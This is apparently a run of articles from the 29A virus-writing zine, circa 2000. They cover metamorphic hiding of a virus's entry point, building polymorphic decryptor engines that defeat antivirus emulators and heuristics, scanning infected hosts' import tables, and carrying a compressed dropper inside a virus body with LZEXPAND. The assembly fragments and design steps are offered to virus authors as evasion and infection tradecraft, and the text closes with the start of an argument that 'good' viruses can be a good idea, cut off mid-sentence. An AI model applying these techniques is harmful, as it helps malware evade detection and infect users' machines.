ÚÄÄÄÄÁÄÄÄÄÄ¿ÚÄÄÄÄÁÄÄÄÄÄ¿ÚÄÄÄÄÄÁÄÄÄÄ¿ÚÄÄÄÄÄÁÄÄÄÄ¿ÚÄÄÄÄÄÁÄÄÄÄ¿
³ Address1 ³³ Address2 ³³ Address3 ³³ Address4 ³³ Address5 ³
ÀÄÄÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÄÄÙ
Basically any route that goes downward can be generated by the
metamorphic process (for example call to place5, with instruction set i1
that accesses address Address5). Almost all places and Addresses should be
used, each one for a different instruction. The Instruction set should be
wider because for different instruction we must metamorph the specific code.
But the places and the addresses can be common to all instructions.
Of course, I don't have to say that the address of the places and of
the addresses should be as mangled as possible inside the real code.
ÛßßßßßßßßßßßßÛÍ»
Û Advanced Û º
ÛÜÜÜÜÜÜÜÜÜÜÜÜÛ º
ÈÍÍÍÍÍÍÍÍÍÍÍÍͼ
Now let's move to a deeper thing. Imagine that there exists a really,
really masochistic person who realised the way your code behaves and he
wants to find all the addresses where your code stores the EIP (in order to
properly disinfect the victims). He could generate for example 500 samples
of your code and have 10 people analyze them. It wouldn't be very hard, all
they would need would be a table to be filled in with the offsets for the
places, addresses and where to look-up the address inside the instruction.
Do you think that all the situations would be met in such many generations?
Sure, if you do not use a smart slow metamorphism. This kind of slow
metamorphism would mean this: each of the three variables (place, address
and instruction set) should be changed at different moments, once a counter
passed a value of 20. So, every 20 generations the place would change. Every
20 generations the address will change, etc. This assures us that at least
20 generations something wouldn't change. This means that to get all the 10
possibilities for the place at least 200 generations should be created and
everytime the random number should generate a different number... which is
almost impossible. 200+ 200+ 200, that means 600 generations and with the
assumption that the randomizer generates exactly what you want. I think in
6000 generations the conditions should be hardly met. To analyze 6000
generations is... well, at least suicidal...
Let's assume that you made your code metamorphize the instruction:
into a "call place", with all the links presented above. And let's
imagine that this instruction will appear 5 times in your code (maybe a few
times only as decoy). It wouldn't be very nice to encode it everytime by a
call to place. The use of a Madness Jump Table would solve this.
Here goes:
No matter what instruction you start with, you wind up in the same
adress: place (note that the call place was replaced by a jmp place, because
the call is already done from the beginning and we don't want two addresses
on the stack).
Now, please look carefully at the above table. Imagine that in each
tree block you mangle the left side (the jumps) between them completely
random. Does anything happen? No, because anyway, the trace will still lead
to the same place. But you will have 5 instructions that will jump each
through 6 everytime different jump places, everytime reaching a different
place, where a diferent set of instructions is applied in order to use a
value which is stored in a different place, which is absolutely necessary
for the run of the program... Did you compile what I just said?
Will this decrease the speed of your code? Not at all... Will it
increase it's size. Sure, a little but not so much. 20 jumps and call in
total means 100 bytes, plus 20 bytes per instruction set (provided we have
10 instruction sets), gives another 200. So, a total of 300 bytes added to
your code as functional side. Plus the additional place took by the address
storage and instruction sets storage.
ÛßßßßßßßßßßßßÛÍ»
Û Using it Û º
ÛÜÜÜÜÜÜÜÜÜÜÜÜÛ º
ÈÍÍÍÍÍÍÍÍÍÍÍÍͼ
Where to apply?
So, let's see where should the metamorphic paradigm apply (I just
looove this kind of diryt talking... ;-):
1. original entrypoint
2. original code hunk address
3. original code encryption key
4. original code hunk length
ÛßßßßßßßßßßßßßÛÍ»
Û Some tips Û º
ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÛ º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
How to place all these infos and not get lost into your own code?
This implies that you know exactly what you start from and you put
everything on paper. Then, the Madness Jump Table offers a very good place
for data hidding. Design the table and then put the addresses between the
jumps. You might even insert some decoy there (like 0FFh prefixes before the
jumps to make the compiled code look horible ;-).
Encrypt very well the core of the metamorphic engine. For this I
suggest a non-linear algorithm with multiple passes (like an endless loop).
Inside the metamorphic engine use address decoy. I will not enter in details
with this technique, I will only present it briefly:
Instead of saying:
say:
ÛßßßßßßßßßßßßßßßÛÍ»
Û How to code Û º
ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
This is the part that moves the data from one address to another. It
requires a table like this:
AddressTable:
Ahunk1:
size1 = x
_addr11 dd offset address11
_addr12 dd offset address12
...
_addr1x dd offset address1x
Ahunk2:
size2 = y
_addr21 dd offset address21
_addr22 dd offset address22
...
_addr2y dd offset address2y
...
AhunkN
...
,where each hunk is used for a specific value (like oldEip or code
address), and each addressAB represents possible places inside the data area
where the actual value can be stored.
The engine will parse then each hunk, given it's size, go at each
address (aligned with the delta handle of course) and fill it with either a
random value, or the real value, as it decides. Just when the address for
the real value is decided, the instruction filler should be called directly
to prevent future passes over the tables. The instruction filler tells the
instruction to address on the specific address where the actual data is
placed.
InstructionTable:
Ihunk1:
__size = a
_instr11 dd offset instruction11
_byteoffset11 = 3
...
...
instruction11:
push edx
mov edx, [ebp+oldEip]
mov [edx], eax
pop edx
the first instruction is 1 byte long and the second is 6 bytes long,
and the address of oldEip is stored on the fourth byte starting from the
instruction11 address. You can simply compute these values by entering
TurboDebugger, typing the instructions and instead of oldEip put 8888888h
and see on what byte does it start.
This part of the engine receives the address of the data from the
address generator. It will then go at each instruction's offset and fill in
at the proper byte offset the address it received. Then it will choose one
of the instructions and pass it's number to the place filler.
This part doesn't need another table. It will simply mangle the
instruction sets between them as held in the InstructionTable table, and for
the instruction to be executed (as received from the instruction filler) it
will pass this value to the jump table filler.
The jump table filler simply mangles between them the jumps in each
jump block (look above) and then replaces the 'jmp place' instruction with
the proper jump to the address it received from the place filler (the
instruction to be executed). Then, for each caller it will choose a random
entry into the jump table tree and fill it in using this table:
FinalTable:
Fhunk1:
____size = 5
_call11 db offset _caller11
...
All this been set up, your code will have somewhere inside it this
instruction:
The store eip jump table tree will guide the call through the random
tree. It will finally reach at a proc which will hold one of the many
instruction sets you prepared to put a value in [ebp+oldEip], where the
oldEip address will be one of the many places you have to store this value.
ÛßßßßßßßßßßßßßßÛÍ»
Û Final word Û º
ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Lord Julus/29A (Mar.2000) ³Û
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÛ
ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
ÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄ
ÍÍÍÍËÍÍÍØÍÍÍÍÍÍÍÍÍÍËÍÍËÍÍËÍÍËÍÍËÍÍËÍÍËÍÍËÍÍËÍÍËÍÍËÍÍËÍÍËÍÍËÍÍÍÍÍÍÍÍÍÍØÍÍÍËÍÍÍÍ
º ³ ÚÄÄÐÄÄÐÄÄÐÄÄÐÄÄÐÄÄÐÄÄÐÄÄÐÄÄÐÄÄÐÄÄÐÄÄÐÄÄÐÄÄÐÄÄ¿ ³ º
º ÃÄÄÄÄÄÄÄ´ Advanced polymorphic engine construction ÃÄÄÄÄÄÄÄ´ º
º ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ º
ÈÍÍÍØÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍËÍÍËÍÍËÍÍËÍÍËÍÍËÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍØÍÍͼ
³ ÚÄÄÐÄÄÐÄÄÐÄÄÐÄÄÐÄÄÐÄÄÐÄÄÐÄÄ¿ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ by ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
³ The Mental Driller / 29A ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
I wrote this for win32 engines. I'm not very versated in Linux/Unix virusing,
but modifying some words on this article (and some points in the index) it
can be extrapolated to engines under these systems.
Ú---úú .
| Index |
` úú--ÄÙ
0. Some comments
1. Making more complex polymorphic engines
1.1 Size of decryptors
1.2 Algorithmical applications
1.2.1 PRIDE technology
1.2.2 Branching technology
1.3 Internal recursivity
2. Don't give a chance to AVs
2.1 Coherent decryptor structures
2.2 Opcodes to avoid
3. Advanced garbage generation
3.1 Memory accesses
3.2 API calls
3.3 Recursive garbage functions
4. Last words
ÚÄÄÄÄÄÄ---úú .
| 0. Some Comments |
` úú--ÄÄÄÄÄÄÄÙ
This article is made for those who made its polymorphic engine and they want
to improve their knowledge and their techniques, making a better polymorphic
engine. I have to advice that the techniques I'm going to explain are very
time consumming (an error in the coding, being little or not, can generate
huge errors that aren't easy to trace back, or little errors in the code
generation that can pop up in the least expected moment).
Well, so let's on. I've tried to make both organized article and clear
explanations, but sometimes it can be a little hard to understand. Well,
considering that I'm not an expert on article writing, I've done what I
could ;).
ÚÄÄÄÄÄÄ---úú .
| 1. Making more complex polymorphic engines |
` úú--ÄÄÄÄÄÄÄÙ
Other thing that we have in favour of big decryptors is the impossibility for
an emulator to determine in a few instructions if it's a decryptor or not,
forcing it to emulate deeply. 1 Kb of garbage before starting the decryption
should be enough, but you have to thing that every time processors are better
(faster, cheaper, etc. etc.) so emulators too. Garbage is executed very fast
upon normal execution, but it can take a good while upon an emulator. The more
garbage you put, the more time an emulator needs and the less possibilities
the emulator reach the decrypted virus, always you put coherent garbage to
avoid the heuristic detections of "strange" instruction using, and also you
have to mantain a good balance between quantity and quality of code generation
(putting 20 Kb of very complex garbage can slow the initial execution of the
application, noticing the user there is something unusual on his/her system).
This particularity is also detected by AVs emulators. The only way to hide
this is to make an "in-appearance" random accessing to that memory, to cheat
the emulator and force it to determine that they are part of a normal memory
access of an application, and that's what I researched a lot until I found
this formula, very easy to do polymorphically. It's adapted to byte-to-byte
decryption, but I explained how to adapt it to others down.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Random(Number) symbolizes a random number between 0 and Number-1 (just like³
³ the C function) ³
³ ³
³Encrypted_Data_Size = The size of encrypted part, rounded to the next power³
³ of 2 (I explain this later) ³
³InitialValue = Random(Encrypted_Data_Size) ³
³ ³
³ The formula ³
³ ----------- ³
³ Register1 = Random(Encrypted_Data_Size) ³
³ Register2 = InitialValue ³
³ Loop_Label: ³
³ Decrypt [(Register1 XOR Register2)+Begin_Address_Of_Encrypted_Data] ³
³ Register1 += Random (Encrypted_Data_Size) AND -2 ³
³ ÀÄÄÄÄÄ> Take care with this one! ³
³ Register1 = Register1 MOD Encrypted_Data_Size ³
³ Register2++ ³
³ Register2 = Register2 MOD Encrypted_Data_Size ³
³ if Register2!=InitialValue GOTO Loop_Label ³
³ GOTO Begin_Address_Of_Encrypted_Data ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
That's it! Very short, very easy to code, and very randomized. Let's see it
by parts, and I'll explain the mathematical aspects of the formula (why it's
like this and no like other):
The first thing to consider is the fact that the encrypted part must be a pow
of 2. If you look at the formula, you can see that the generated decryption
address came from a XOR between two random numbers. The fact is that a XOR
(unlike ADD, SUB, etc.) never modifies a bit higher than the highest bit of
the two numbers, which allows us to know always the top limit of the
resulting number (always power of 2).
Now, the used registers: Register1 is used as a modifier for the Register2,
and it's a pseudo-random number every time, due to the fact that we generate
its initial value randomly and we add to it a random number every loop. The
work of this formula is done by the Register2, and if you look at it, you can
see that Register2 is no other thing than a counter, so you can increase it
or decrease it, it's up to you (or up to the engine :). Just keep it inside
the limits (between 0 and Encrypted_Data_Size).
Now the real revolution of this formula: I find out, after many tests, that
when you have a counter (Register2) and you XOR a random number to it (always
inside the limits and that, I'm not going to repeat this anymore :) you get a
different number, and if you add to the XORing value a little special random
number and increase the counter, the next time you do the XOR to the counter
you will get another different number. When you have completed all the count
sequence (from 0 till NumberPowerOf2), you get a sequence of random numbers
which touch all the numbers from 0 till NumberPowerOf2, but without anyone
repeated! It's like making a permutation of a sequence, but you don't have to
store any vector nor generate any data. Since the formula randomizes all its
numbers, it doesn't vary very much from the "standard" decryptor.
I referred sometimes to a "special random number", which is the one that you
have to XOR to the counter. This one is special because you have to keep it
in a "level" down than the other random numbers. I explain this, and please
keep attention to it, because is very important:
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º When you use this technology, most random numbers are from 0 until the º
º size of the data to decrypt (pow of 2). There's a particularity in the º
º formula that it's necessary for the correct development and returning º
º reliable values: you must "align" the numbers (so, the result of º
º Random(Encrypted_Data_Size) must be multiple of 1 if we decrypt by byte º
º ptr (nothing special here, then), be multiple of 2 if we decrypt by word º
º ptr, and multiple of 4 if we decrypt by dword ptr). But the number that º
º we add to the XORing value is slightly special because it has to be º
º aligned in an upper grade, I mean, if you use byte ptr for decryption, º
º that number must be multiple of 2, multiple of 4 for word ptr and of 8 º
º for dword ptr. That is easily achieved by getting, before coding the º
º opcode of the instruction, the random number to add, and then doing an º
º instruction: º
º AND Value,Encrypted_Data_Size-2 (for bytes), or º
º AND Value,Encrypted_Data_Size-4 (for words), etc. º
º (in the engine, not in the decryptor!). º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Just take this into account because, if not, the decrypted part will be
touched two times, leaving it corrupted (I found out this after becoming mad
and furious after several hours of seeing a correct engine and an incorrect
decryption, and after coding thousands of little programs to test that :).
This method, although powerful, can be defeated with the detection of the
code loops, so we must do anything to break the linearity of the decryptor
execution. The easiest way is to put some conditional jumps in the middle,
but it seems that the emulators detect which zone of code is more frequently
executed (or something like that), so I thought about it and created the next
technique:
When you look at a legitimal application, you can see that it has many
conditional jumps, followed by code, and the normal thing is that a portion
of code isn't executed an ununderstandable number of times as a decryption
loop does. We must break this, and the way can be this:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³First we have this arrays and values: ³
³ ³
³ArrayOfJumps dd N dup (0) ³
³ArrayOfJumpsNdx dd 0 ³
³JumpsToComplete dd N dup (0) ³
³JumpsToCompleteNdx dd 0 ³
³ ³
³ ³
³ ³ ³
³ ³ This is the beginning of the decryptor. This is the part when the ³
³ ³ registers are setted to their starting value, and all things that ³
³ ³ that we must put at the beginning. ³
³ ³ ³
³ ³ ³
³ x First address stored into ArrayOfJumps ³
³ ³ ³
³ ³ Garbage ³
³ ³ ³
³ .ù*ù. Random conditional jump with a very random probability of jump ³
³ ³ ³ Garbage ³
³ x x 2nd and 3rd address stored into ArrayOfJumps ³
³ ³ ³ Garbage ³
³ .*. .*. Random conditional jumps ³
³ ³ ³ ³ ³ ³
³ ³ ³ ³ ³ Four decryption algorithms that perform the same op. but with ³
³ ³ ³ ³ ³ different code. ³
³ ³ ³ ³ ³ ³
³ ³ ³ ³ ³ ³
³ | | | | Final-of-decryption check ³
³ R R R R Loop to continue decrypting (jump randomly to one of the addr. ³
³ | | | | stored in ArrayOfJumps) ³
³ ³ ³ ³ ³ Garbage ³
³ | | | | ³
³ V V V V Jump to decrypted virus ³
³ ³
³(This would be generated with 3 levels of recursivity. Just look down to see³
³the explanation) ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
I think the technique is quite clear looking at the diagram, but I'll explain
it in words:
1. Â First step Â
ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ
You must code a recursive function that I'm going to call "DoBranch".
This function has to manage the coding as if it were a tree. Once in
the engine, when you begin to construct a decryptor, you insert first
the instructions that set our going-to-be-used registers to their
operative value. Once you have this, and after generating some garbage,
you call to "DoBranch". You must sure that the function, since it's
recursive, is going to execute several times, so don't put fixed memory
variables. Use stack or indexed variables, instead.
2. Â Recursivity r0x! Â
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
DoBranch takes the control, and the function doesn't return completely
until the whole decryptor is finished. The function must know which
level of recursivity is, so you have to put a variable that increases
every time you enter into "DoBranch" (INC [RecursivityLevel] at the
very beginning). Every time you return from the function you must
decrease that variable.
4. Â Interjumping code Â
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
If you didn't arrive to the desired level of recursivity (yet), and
after saving the actual address (point 3), generate garbage (a good
amount of). When you decide that you have enough, then generate a random
conditional jump. It must be very random, just like CMP Reg1,Reg2/JA xxx
or similar, begin Reg1 and Reg2 garbage registers, if possible
(the ones you put on garbage instructions). There is a huge set of
possibilities (another very good one is TEST Reg,Value / J(N)Z xxx,
being Value a number power of 2 - only one bit set).
We must store then the address of the conditional jump we made, because
we don't know yet to which address we have to jump, so we save
this and later we'll calculate and complete this jumps. It's enough to
push the address onto the stack.
After saving this, we code this leave of the binary tree: you call
"DoBranch" again, and when it returns... voil…! We have a complete
branch coded, and of course the index of instruction insertion points
to the place where the next branch will be. So, we pop the address
that we pushed before, we calculate the distance between the actual
insertion index and the saved address, and then we complete the
conditional jump that the save address point at with that calculated
value. After this little operation, call "DoBranch" again, decrease
[LevelOfRecursivity] and RET.
When we finish, we'll have a decryptor that its behaviour is exactly the same
as a normal one, but that you never know which branch of code is going to be
executed every time, since when you jump to loop, you perform a random number
of random comparisions and conditional jumps that will drive you to a random
decryption part. Due to the fact that every final part of the branch does the
same than the others, we don't care which one becomes executed every time, so
we broke the linearity of execution and now, "from the outside", the decryptor
resembles a normal application following its conditions, not a decryption
loop.
; DL=Register to use
; EAX=Value to move to the register
call GiveMeABufferAddress
; Now, EBX=Buffer address where we can store a dword
call DoMOVMemValue ; Using EBX as address and EAX
; as value
call DoMOVRegMem ; Using EBX as address and DL
; as register
ret
AdjustMemToValue:
mov ecx, eax
call Random ; EAX=Random number
sub ecx, eax
xchg ecx, eax
call DoMOVMemValue ; Move EAX to [EBX]
call MakeGarbage
mov eax, ecx
call DoADDMemValue ; Add EAX to [EBX]
ret
Of course, we don't use only ADD, but XOR, SUB, etc. And we don't use
this only in memory addresses, so we can use it in another chance:
AdjustRegToValue:
mov ecx, eax
xchg ecx, eax
call DoMOVRegValue ; Recursive call
call MakeGarbage
mov eax, ecx
call DoADDRegValue
ret
After this, you can see how powerful is the recursive code generation, and how
a simple MOVing can derive in a quite complex set of assignations from to
memory/registers, giving as a final result the desired value in the desired
register. Many functions can be done in this way, and later we'll see its
application to make garbage.
ÚÄÄÄÄÄÄ---úú .
| 2. Don't give a chance to AVs |
` úú--ÄÄÄÄÄÄÄÙ
But even the most recursive engine in the world can make all the work
worthless if it's detected heuristically because it put a strange instruction
or a quite common polymorphic structure, like:
JMP Next
Subroutine:
...
ret
Next: call Subroutine
or similars, because no normal application does that.
Do you think it's normal to find this in a normal application? Then, the
emulator thinks the same :). Avoid this and avoid inserting direct random
data without being linked to any direct instruction.
This advide is also for some 16 bits instructions under win32 applications.
While coding the TUAREG engine, I put nearly all the instructions the garbage
generator could generate to use 8, 16 or 32 bits, and then, when scanning with
AVP, the emulator switched always to deep scan. After thinking about it, I
removed the generation of some 16 bits instructions and AVP didn't make that
again. I don't know which instructions make AVP to activate that heuristic
flag, but invariably I recommend to use as less as possible 16 bits
instructions.
ÚÄÄÄÄÄÄ---úú .
| 3. Advanced garbage generation |
` úú--ÄÄÄÄÄÄÄÙ
Now, we are going to enter in one of my favorite subjects: garbage generation.
My opinion is that the main power of a polymorphic engine is the function to
generate garbage, since the garbage is the code that makes the emulators to
give up tracing or help them to determine the nature of the program. So, the
more normal the garbage seems, the less suspicious the decryptor seems, and
the more complex the garbage is, the less an emulator can enter into the
decryptor to emulate. Let's see some types, although there aren't all
(obviously I'm not going to explain the easy ones). Imagination also counts!
But the fact is that, while in MS-DOS we had all the memory accesible, and we
could read from everywhere, this isn't true for win32, and an attempt to read
from "everywhere" will cause, in the great majority of times, an exception.
Writing is much more restrictive under win32, because we can only write on
the sections we defined as WRITABLE on the PE header (although we want to
generate an exception, of course :). So, we can use some tricks to have frames
of memory to read and/or write indiscriminatedly.
In win32 executables, we have a section that exists in nearly all them: the
".bss" section. This section has a physical size (in file size) of 0, but
virtually can be quite big (its size is normally 1000h bytes at least, but in
huge programs can arrive to 64K or more). We can use that section to read
and/or write anything we want, but always if we make our virus to execute at
first, not doing Entry-Point Obscuring and such things, since the application
would set all the void data in the section to whatever it needs. There is
another solution, and is to use the void holes in the virus that we use to
retrieve, for example, the current directory with GetCurrentDirectory or
similar functions. Since we don't need that fields until the virus is
executing, we can use that holes, if they are big enough, as frames of memory
in the same way as .bss, where we can read and write things.
So, once we have that frames, and we are sure that at least 256 or 512 bytes
are free to do animalities :), we can code a function to retrieve a random
memory address, for example:
call Random
and eax, 0FCh
add eax, [AddressOfMemoryFrame]
ret
It's not easy to put them, and we only can call those ones that we know how
to call, so we have to have information about all them (there isn't a
"generic" way of calling them), and moreover we need to find and scan the
import directory of the victim host while infecting it, so we have to deduce,
from the virtual address (since we only know that about the import directory
from the PE header), which physical address is, and then from the physical
address convert to virtual address to have the imported API calling address.
The method I follow is the next, assuming we have the host mapped in memory:
5) We scan the imported modules and we look for known functions, but
taking in account that every time we get an RVA first we have to
convert it to physical (this applies while getting values from the
array of RVAs to the names of the functions), so, having the RVA,
we subtract the RVA of the section and we add the physical address
of that section, so we get the physical address of the name of the
function.
6) Then, when we find the desired functions, we get the order in the
array of imported addresses. We add to that number the virtual
address of that array in order to get the virtual address where the
imported address will be stored.
7) We save that number, and we continue searching for more functions.
After that, we get the addresses to the import where the virtual addresses to
the functions will be stored. Now, a call like CALL [Obtained_Address] will
make a call to the API. Just be careful with the parameters and with the
functions were a buffer is required.
Another thing: as Micro$oft programmers are dumb or worse, there are functions
that can hang the application, like GetModuleHandleA. I've tried to pass to it
a random pointer as the module name to get the handle of, but then an
exception occurs, instead of returning an error telling "no valid string" or
"module not found" or something like that, so be careful with some functions.
3.3 Recursive garbage functions
-------------------------------
Before we saw the potential of recursive calls to make things, and now we
apply that to garbage. There are some types of garbage that we can make (and
we must make) in a recursive way, like CALLs, random loops and some more. Here
I'll explain CALLs and random loops.
Subroutine1:
...
call Subroutine2
...
ret
Subroutine2:
...
call Subroutine1
...
ret
That situation can produce a hang of the decryptor, and thus the application
never executes. To avoid that, we can use arrays to store "levels" of calls,
in this way:
When we enter in the CALL generation part of the engine, we must increase a
variable, like an internal recursivity level, to control the level of call
that we are generating now, in a way that makes that Level 1 calls never will
generate a call to Level 1 or upper, and the same for Level 2 and so on. In
thas way we avoid situations like the one above, since a subroutine won't
call other subroutine which will drive execution to the same subroutine again.
Other recursive garbage generation is the random loop generation. We can put
little, annoying loops that do nothing but that, loop (just seven or eight
times, nothing that last very long). Since a random loop inside a random loop
is equal to a geometrical increment of the loop duration, better if we avoid
them, having a variable telling "I'm in a loop now, so don't make another".
The same applies for CALLs, since we code them later, not in that moment, and
maybe we put another loop inside the generated subroutine, which would produce
the same problem. So, when generating looping code, avoid making other loops
or calls. To make the loop, of course, we call to DoGarbage to fill some
looping space (a void loop isn't normal, you know).
And, as you could deduct, maybe, we can use DoMOVRegValue and all those
functions that we coded to generate more garbage: just take a garbage register
and a random number and use that functions.
ÚÄÄÄÄÄÄ---úú .
| 4. Last words |
` úú--ÄÄÄÄÄÄÄÙ
Well, this article is shorter than I expected, but I hope it'll be useful for
you to bring you ideas while coding your new polymorphic engine. The great
majority of ideas I expose here have been used in the TUAREG engine, and
sometimes in the source code of the TUAREG I refer to this article to get the
explanation of some techniques. Laterz!
ÄÄÄÄÄ---úú
The Mental Driller / 29A
ÄÄÄÄÄ---úú
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
LZEXPAND Tutorial
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
by Bumblebee/29a
Introduction
ÄÄÄÄÄÄÄÄÄÄÄÄ
This tutorial explains how to expand a compressed file using win API
and MS COMPRESS.EXE. It is a lame tool to compress files with a LZ algo
and the format required by LZEXPAND.DLL. Look at tools section at this
zine and you'll find COMPRESS.EXE there.
We can compress a dropper, as example, and put inside your virus body.
Due the dropper was compressed using an external program we don't need
to care about the compression algo. When we need the file uncompressed
we don't need to carry the expand routines inside virus body because
winshit provides us a simple way to expand it using standard win32 API.
What is a LZEXPAND.DLL?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
It's simply a library that contains some functions to manage the LZed
files within our win32 appz.
Let's check what is provided:
There are other functions but we are going to use only those.
Get LZEXPAND.DLL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
We need to load LZEXPAND.DLL library and get the address of the func
in order to use them. It is done as usual. Notice we call LZ32.DLL coz
we are running a 32 bits app and LZEXPAND.DLL is a lame NE file :)
Let's show ya an example:
Using LZEXPAND.DLL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
OFSTRUCT struc
cBytes db ? ; lenght of the struct
fFixedDisk db ? ; non zero if file on HDD
nErrCode dw ? ; DOS error code if open fails
Reserved dw ?,?
szPathName db 128 dup(?) ; path name
OFSTRUCT ends
Returns the size of the destination file and < 0 value for error.
extrn ExitProcess:PROC
extrn LoadLibraryA:PROC
extrn GetProcAddress:PROC
extrn FreeLibrary:PROC
OFSTRUCT struc
cBytes db ? ; lenght of the struct
fFixedDisk db ? ; non zero if file on HDD
nErrCode dw ? ; DOS error code if open fails
Reserved dw ?,?
szPathName db 128 dup(?) ; path name
OFSTRUCT ends
file_in db 'file.tx_',0
file_out db 'file.txt',0
hnd_in dd 0
hnd_out dd 0
.CODE
inicio:
push offset LzExpandZs
call LoadLibraryA
or eax,eax
jz LzExpandNotLoaded ; failed loading dll
mov dword ptr [LzExpandHnd],eax
push OF_READ
push offset ofStruct
push offset file_in
call dword ptr [_LZOpenFileA]
cmp eax,0
jb LzExpandFuncFailed
mov dword ptr [hnd_in],eax
LzExpandFuncFailed:
push dword ptr [LzExpandHnd]
call FreeLibrary
LzExpandFuncNotFound:
LzExpandNotLoaded:
push 0h
call ExitProcess
Ends
End inicio
; cut here ----------------------------------------------------------------
Where to use it
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
With n less than 100 kbs. I've tested with Plage2000 and i've got:
As you can see, in this example we can use LZEXPAND very fine.
Last words
ÄÄÄÄÄÄÄÄÄÄ
Micro$oft Winblows if full of shit we can use for our own profit. We
only need to see what it brings and just get it. Now you can use simple
compression in your projects with the APIs provided by M$.
by VirusBuster/29A
Back in 1997, the well known antivirus expert Vesselin Bontchev wrote
an article giving twelve reasons to proof viruses are always a bad idea.
That's too pedantic for my vx taste, then i decided to write this article
explaining why a "good" virus can be a good idea.
First, we will hear what "good thinking minds" have to say about the
question. Here we have Vesselin's article with his 12 reasons:
by Vesselin Bontchev
2. Modifying a program could mean that the owner of the program loses
his/her rights for technical support, ownership, or copyright.
3. Once released, you have no control on how the virus will spread; it
may reach a system about which you know nothing (or which could have
even not existed at the time the virus is created) and on which it
might cause non-intentional damage. Even if the bug is discovered, it
would be extremely difficult to find all replicants of the virus and
apply the appropriate fix to them.
4. A bad guy could get a copy of the virus and modify it to include
something malicious. Actually, a bad guy could trojanize -any-
program, but a "good" virus will provide the attacker with means to
transport his malicious code to a virtually unlimited population of
computer users.
6. A virus will eat up disk space and time resources unnecessarily while
it spreads.
8. A virus will disable the few programs on the market which check
themselves for modifications and halt themselves if they have been
changed, thus performing a denial-of-service attack.
9. Anything useful that could be done by a virus, could also be done with
a normal, non-replicating program.
10. A virus steals control of the machine from the user and ruins the
trust that the user has in his/her machine - the belief that s/he can
control it.
11. Declaring some viruses as "good" will just give an excuse to the crowd
of virus writers to claim that they are actually doing "research".
12. For most people the word "computer virus" is already loaded with
negative meaning. They will not accept a program called like that,
even if to claims to do something useful.
Here you can read a more recent article talking about the same matter...
(IDG) -- H.L. Mencken once said, "For every human problem, there is a neat,
simple solution; and it is always wrong."
This is tempting for several reasons. One, turning a weapon against itself is a
poetic concept. Two, it's a technical challenge that lets ethical programmers
